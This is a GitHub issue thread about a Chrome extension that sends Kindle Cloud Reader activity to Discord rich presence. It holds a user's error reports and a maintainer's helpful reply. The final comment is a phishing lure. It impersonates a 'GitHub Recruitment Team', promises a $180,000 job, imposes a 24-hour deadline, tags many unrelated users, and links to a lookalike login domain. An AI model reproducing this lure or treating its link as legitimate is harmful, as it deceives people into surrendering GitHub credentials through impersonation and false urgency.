### ISSUE TITLE
Don't work?

### ISSUE THREAD

**Issue by Shxdxs** [phusitsom/kindle-cloud-reader-rpc#2]
Hi, I installed the extention and launched the console but nothing happens, the console remains empty and the extention returns these errors on chrome: 

> Error handling response : TypeError : Cannot read properties of undefined (reading 'length') at chrome-extension://cajbjpmjnojnbfgnmlhgmccahhbnbona/background.23452572.js:1:557 at chrome-extension://cajbjpmjnojnbgnmlhgmccahhbnbona/background.23452572.js:1:778

> Runtime.lastError unchecked: Unable to establish connection. Recipient does not exist.

> Unchecked runtime.lastError : Message port closed before a response was received.

**Comment by Shxdxs** [comment]
After reboot my PC i get this in console but nothing on Discord : 

>127.0.0.1 - - [07/Aug/2023 14:24:40] "DELETE / HTTP/1.1" 200 -
>127.0.0.1 - - [07/Aug/2023 14:24:46] "PUT / HTTP/1.1" 200 -

**Comment by lazykern** [comment]
> Error handling response : TypeError : Cannot read properties of > undefined (reading 'length') at chrome-extension://cajbjpmjnojnbfgnmlhgmccahhbnbona/background.23452572.js:1:557 at chrome-extension://cajbjpmjnojnbgnmlhgmccahhbnbona/background.23452572.js:1:778

> Runtime.lastError unchecked: Unable to establish connection. Recipient does not exist.

> Unchecked runtime.lastError : Message port closed before a response was received.

I will make sure to handle those exception from your first comment in the next release. These exceptions can be ignored for now.

---

> After reboot my PC i get this in console but nothing on Discord :
> > 127.0.0.1 - - [07/Aug/2023 14:24:40] "DELETE / HTTP/1.1" 200 -
 > 127.0.0.1 - - [07/Aug/2023 14:24:46] "PUT / HTTP/1.1" 200 -

The extension and client is working. But there might be something off with the rich presence. I will release an executable for debugging later. 

Thank you for pointing out the issue!

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Ethnical, @anthonyoliai, @aliihsancengiz, @drgomesp, @QiangL, @oxlime, @Chriscbr, @saucepoint, @cuongquangnam, @rameight, @touhonoob, @lostsnow, @dmmulroy, @taishi8117, @hamidra, @jgannonjr, @modulareum, @martinezjorge, @Bruce1115, @joachimneu
